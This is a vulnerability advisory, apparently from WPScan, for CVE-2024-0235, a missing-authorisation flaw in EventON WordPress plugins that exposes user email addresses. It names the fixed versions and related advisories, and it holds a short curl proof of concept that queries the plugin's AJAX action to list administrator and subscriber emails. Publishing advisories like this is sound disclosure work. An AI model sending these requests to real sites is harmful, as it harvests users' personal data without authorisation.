EventON (Free < 2.2.8, Premium < 4.5.5) – Unauthenticated Email Address Disclosure | CVE 2024-0235 | Plugin Vulnerabilities

Description

The plugins do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog

Proof of Concept

To get the administrator user emails:

curl -X POST --data '_user_role=administrator' 'https://example.com/wp-admin/admin-ajax.php?action=eventon_get_virtual_users'

To get the subscriber user emails:

curl -X POST --data '_user_role=subscriber' 'https://example.com/wp-admin/admin-ajax.php?action=eventon_get_virtual_users'

etc to get others

Affects Plugins

Fixed in 4.5.5

Fixed in 2.2.8

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

e370b99a-f485-42bd-96a3-60432a15a4e9

Timeline

Publicly Published

2024-01-10 (about 4 months ago)

Added

2024-01-10 (about 4 months ago)

Last Updated

2024-01-10 (about 4 months ago)

Other

Published

Title

Published

2024-04-16

Title

EleForms – All In One Form Integration including DB for Elementor < 2.9.9.8 - Missing Authorization to Sensitive Information Exposure

Published

2024-01-24

Title

InstaWP Connect < 0.1.0.10 - Missing Authorization to Sensitive Information Dislcosure

Published

2023-10-11

Title

Responsive Image Gallery, Gallery Album <= 2.0.3 - Missing Authorization via Multiple AJAX Actions

Published

2024-03-04

Title

Page Builder Sandwich – Front End WordPress Page Builder Plugin <= 5.1.0 - Sensitive Information Exposure

Published

2024-05-06

Title

WP Post Author – Enhance Your Posts with the Author Bio, Co-Authors, Guest Authors, and Post Rating System, including User Registration Form Builder <= 3.6.4 - Missing Authorization